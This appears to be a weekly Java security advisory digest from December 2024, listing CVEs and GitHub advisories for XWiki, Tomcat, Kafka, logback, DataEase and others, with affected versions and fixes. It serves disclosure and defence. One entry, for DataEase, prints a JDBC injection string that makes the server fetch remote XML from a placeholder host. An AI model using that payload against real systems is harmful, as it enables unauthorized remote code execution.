2024-49 Java Security Weekly News - Red Hat, Amazon, GitHub
2024 » Published on December 20, 2024
 | Red Hat Security Advisory |
 | Amazon AWS Security Advisories |
 | Github Security Advisories |
| [GHSA-w9j7-phm3-f97j] Ucum-java has an XXE vulnerability in XML parsing org.fhir:ucum - impacts versions: < 1.0.9 fixed in: 1.0.9 [GHSA-j2pq-22jj-4pm5] XWiki allows remote code execution through the extension sheet org.xwiki.platform:xwiki-platform-repository-server-ui - impacts versions: >= 3.3-milestone-1, < 15.10.9 fixed in: 15.10.9 org.xwiki.platform:xwiki-platform-repository-server-ui - impacts versions: >= 16.0.0-rc-1, < 16.3.0 fixed in: 16.3.0 [GHSA-wh34-m772-5398] XWiki Platform has an SQL injection in getdocuments.vm with sort parameter org.xwiki.platform:xwiki-platform-distribution-war - impacts versions: >= 11.10.6, < 13.10.5 fixed in: 13.10.5 org.xwiki.platform:xwiki-platform-distribution-war - impacts versions: >= 14.0-rc-1, < 14.3-rc-1 fixed in: 14.3-rc-1 [GHSA-7mj5-hjjj-8rgw] http4k has a potential XXE (XML External Entity Injection) vulnerability org.http4k:http4k-format-xml - impacts versions: >= 5.0.0.0, <= 5.40.0.0 fixed in: 5.41.0.0 org.http4k:http4k-format-xml - impacts versions: < 4.50.0.0 fixed in: 4.50.0.0 [GHSA-cwq6-mjmx-47p6] XWiki's scheduler in subwiki allows scheduling operations for any main wiki user org.xwiki.platform:xwiki-platform-scheduler-ui - impacts versions: >= 1.2-milestone-2, < 15.10.9 fixed in: 15.10.9 org.xwiki.platform:xwiki-platform-scheduler-ui - impacts versions: >= 16.0.0-rc-1, < 16.3.0 fixed in: 16.3.0 [GHSA-2r87-74cx-2p7c] XWiki allows remote code execution from account through macro descriptions and XWiki.XWikiSyntaxMacrosList org.xwiki.platform:xwiki-platform-help-ui - impacts versions: >= 9.7-rc-1, < 15.10.11 fixed in: 15.10.11 org.xwiki.platform:xwiki-platform-help-ui - impacts versions: >= 16.0.0-rc-1, < 16.4.1 fixed in: 16.4.1 org.xwiki.platform:xwiki-platform-help-ui - impacts versions: >= 16.5.0-rc-1, < 16.5.0 fixed in: 16.5.0 [GHSA-r279-47wg-chpr] XWiki allows RCE from script right in configurable sections org.xwiki.platform:xwiki-platform-administration-ui - impacts versions: >= 2.3, < 15.10.9 fixed in: 15.10.9 org.xwiki.platform:xwiki-platform-administration-ui - impacts versions: >= 16.0.0-rc-1, < 16.3.0 fixed in: 16.3.0 |
 | org.fhir:ucum |
| HIGH | CVE-2024-55887 Ucum-java is a FHIR Java library providing UCUM Services. In versions prior to 1.0.9, XML parsing performed by the UcumEssenceService is vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where ucum is being used to within a host where external clients can submit XML. Release 1.0.9 of Ucum-java fixes this vulnerability. As a workaround, ensure that the source xml for instantiating UcumEssenceService is trusted. Published Friday, December 13, 2024 |
| | Additional Java CVEs |
| N/A | CVE-2024-54677 Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.9.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-50379 Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-12539 An issue was discovered where improper authorization controls affected certain queries that could allow a malicious actor to circumvent Document Level Security in Elasticsearch and get access to documents that their roles would normally not allow. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-56128 Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation. Issue Summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. However, Kafka's SCRAM implementation did not perform this validation. Impact: This vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue. How to Detect If You Are Impacted: If your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check if TLS is enabled, review your server.properties configuration file for listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted. Fix Details: The issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802. Affected Versions: Apache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below. Fixed Versions: 3.9.0 3.8.1 3.7.2 Users are advised to upgrade to 3.7.2 or later to mitigate this issue. Recommendations for Mitigation: Users unable to upgrade to the fixed versions can mitigate the issue by: - Using TLS with SCRAM Authentication: Always deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception. - Considering Alternative Authentication Mechanisms: Evaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security. Published Wednesday, December 18, 2024 |
| N/A | CVE-2024-55951 Metabase is an open-source data analytics platform. For new sandboxing configurations created in 1.52.0 till 1.52.2.4, sandboxed users are able to see field filter values from other sandboxed users. This is fixed in 1.52.2.5. Users on 1.52.0 or 1.52.1 or 1.5.2 should upgrade to 1.52.2.5. There are no workarounds for this issue aside from upgrading. Published Monday, December 16, 2024 |
| N/A | CVE-2024-11993 Reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.1.0 through 7.4.3.38, and Liferay DXP 7.4 GA through update 38, 7.3 GA through update 36, 7.2 GA through fix pack 20 and 7.1 GA through fix pack 28 allows remote attackers to execute arbitrary web script or HTML via Dispatch name field Published Tuesday, December 17, 2024 |
| N/A | CVE-2023-37940 Cross-site scripting (XSS) vulnerability in the edit Service Access Policy page in Liferay Portal 7.0.0 through 7.4.3.87, and Liferay DXP 7.4 GA through update 87, 7.3 GA through update 29, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a service access policy's `Service Class` text field. Published Tuesday, December 17, 2024 |
| 5.7 | CVE-2024-10973 A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-12798 ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core upto and including version 1.5.12 in Java applications allows attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution. Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension. A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege. Published Thursday, December 19, 2024 |
| N/A | CVE-2024-35230 GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. In affected versions the welcome and about page includes version and revision information about the software in use (including library and components used). This information is sensitive from a security point of view because it allows software used by the server to be easily identified. This issue has been patched in version 2.26.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. Published Monday, December 16, 2024 |
| N/A | CVE-2024-49194 Databricks JDBC Driver before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achieve Remote Code Execution in the context of the driver by tricking a victim into using a crafted connection URL that uses the property krbJAASFile. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-55557 ui/pref/ProxyPrefView.java in weasis-core in Weasis 4.5.1 has a hardcoded key for symmetric encryption of proxy credentials. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55451 A Stored Cross-Site Scripting (XSS) vulnerability exists in authenticated SVG file upload and viewing functionality in UJCMS 9.6.3. The vulnerability arises from insufficient sanitization of embedded attributes in uploaded SVG files. When a maliciously crafted SVG file is viewed by other backend users, it allows authenticated attackers to execute arbitrary JavaScript in the context of other backend users' browsers, potentially leading to the theft of sensitive tokens. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55452 A URL redirection vulnerability exists in UJCMS 9.6.3 due to improper validation of URLs in the upload and rendering of new block / carousel items. This vulnerability allows authenticated attackers to redirect unprivileged users to an arbitrary, attacker-controlled webpage. When an authenticated user clicks on the malicious block item, they are redirected to the arbitrary untrusted domains, where sensitive tokens, such as JSON Web Tokens, can be stolen via a crafted webpage. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55952 DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. Published Wednesday, December 18, 2024 |
| N/A | CVE-2024-12801 Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML. The attacks involves the modification of DOCTYPE declaration in XML configuration files. Published Thursday, December 19, 2024 |
| N/A | CVE-2024-12700 There is an unrestricted file upload vulnerability where it is possible for an authenticated user (low privileged) to upload an jsp shell and execute code with the privileges of user running the web server. Published Thursday, December 19, 2024 |